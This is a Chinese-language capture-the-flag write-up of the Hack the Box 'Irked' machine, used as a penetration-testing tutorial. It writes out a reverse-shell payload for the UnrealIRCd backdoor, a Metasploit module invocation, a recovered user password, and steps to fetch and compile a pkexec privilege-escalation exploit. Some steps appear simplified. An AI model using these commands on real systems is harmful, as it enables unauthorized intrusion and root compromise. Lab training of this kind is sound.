hack the box之Irked靶场练习
字数 1458 2025-08-11 11:39:36
Hack the Box Irked靶场渗透测试教学文档
1. 靶场概述
Irked是Hack the Box平台上的一个中等难度靶机,涉及多种渗透测试技术,包括:
- 端口扫描与服务枚举
- IRC服务漏洞利用
- 图片隐写术分析
- Linux权限提升技术
2. 信息收集阶段
2.1 端口扫描
使用Nmap进行初始扫描:
nmap -sV -p- <靶机IP>
发现开放端口:
- 22/tcp - SSH
- 80/tcp - HTTP
- 111/tcp - RPCbind
- 6697/tcp - IRC (UnrealIRCd)
- 8067/tcp - IRC备用端口
- 65534/tcp - Apache HTTP Server
- 53188/tcp - 未知服务
2.2 Web服务枚举
访问80端口和65534端口:
- 80端口:简单网页,包含一张图片
- 65534端口:Apache服务文档
使用目录扫描工具(如dirb、gobuster):
gobuster dir -u http://<靶机IP> -w /path/to/wordlist.txt
发现/manual目录,但仅为Apache文档,无利用价值。
3. 漏洞利用
3.1 IRC服务漏洞
发现6697端口运行UnrealIRCd服务,该服务存在已知后门漏洞(CVE-2010-2075)。
利用步骤:
- 使用netcat连接IRC服务:
nc <靶机IP> 6697 - 发送恶意命令触发后门:
或使用Metasploit模块:AB; bash -i >& /dev/tcp/<你的IP>/<端口> 0>&1use exploit/unix/irc/unreal_ircd_3281_backdoor set RHOSTS <靶机IP> set RPORT 6697 exploit
成功获取反向shell,用户为ircd。
4. 权限提升至djmardov用户
4.1 枚举系统信息
查看当前用户:
whoami
→ ircd
查看系统用户:
cat /etc/passwd
→ 发现djmardov用户
4.2 查找敏感文件
检查djmardov用户目录:
ls -la /home/djmardov
→ 发现Documents/.backup文件
查看.backup内容:
cat /home/djmardov/Documents/.backup
→ 发现可疑字符串(可能与密码相关)
4.3 图片隐写分析
从web服务下载图片:
wget http://<靶机IP>/irked.jpg -O irked.jpg
使用steghide分析隐写:
steghide extract -sf irked.jpg
→ 提取出密码"Kab6h+m+bbp2J:HG"
4.4 切换用户
使用提取的密码切换到djmardov:
su djmardov
密码:Kab6h+m+bbp2J:HG
→ 成功获取djmardov权限
获取user.txt:
cat /home/djmardov/user.txt
5. 权限提升至root
5.1 查找SUID程序
查找具有SUID权限的文件:
find / -perm -4000 -type f 2>/dev/null
→ 发现/usr/bin/pkexec
5.2 利用pkexec漏洞
pkexec存在本地提权漏洞(CVE-2021-4034)。
利用步骤:
- 在攻击机上下载漏洞利用代码:
wget https://example.com/pkexec-exploit.c - 在攻击机启动HTTP服务:
python3 -m http.server 8080 - 在目标机下载并编译:
wget http://<你的IP>:8080/pkexec-exploit.c gcc pkexec-exploit.c -o exploit chmod +x exploit - 执行漏洞利用:
./exploit
→ 获取root shell
5.3 获取root flag
cat /root/root.txt
6. 关键总结与学习要点
-
全面端口扫描:不要仅关注常见端口(80,443),非常规端口可能隐藏关键服务
-
服务版本识别:准确识别服务版本有助于发现已知漏洞
-
图片隐写技术:
- 常用工具:steghide、binwalk、exiftool
- 当发现可疑图片时,应检查元数据和隐藏内容
-
IRC服务安全:
- UnrealIRCd 3.2.8.1存在后门
- 其他IRC服务也应检查已知漏洞
-
Linux提权方法:
- 定期更新SUID程序列表
- 关注常见提权漏洞(如pkexec)
- 使用工具如LinPEAS自动化枚举
-
渗透测试流程:
信息收集 → 漏洞识别 → 初始访问 → 权限提升 → 目标达成
7. 改进建议
- 在web目录枚举阶段,可尝试更全面的字典
- 对于IRC服务,可尝试其他利用方式(如Metasploit)
- 提权时可尝试多种方法(如内核漏洞、cron jobs等)
- 建立系统化的笔记记录发现的每个线索
通过本靶机练习,可以全面掌握从信息收集到权限提升的完整渗透测试流程,特别是对服务漏洞利用和隐写术分析有深入理解。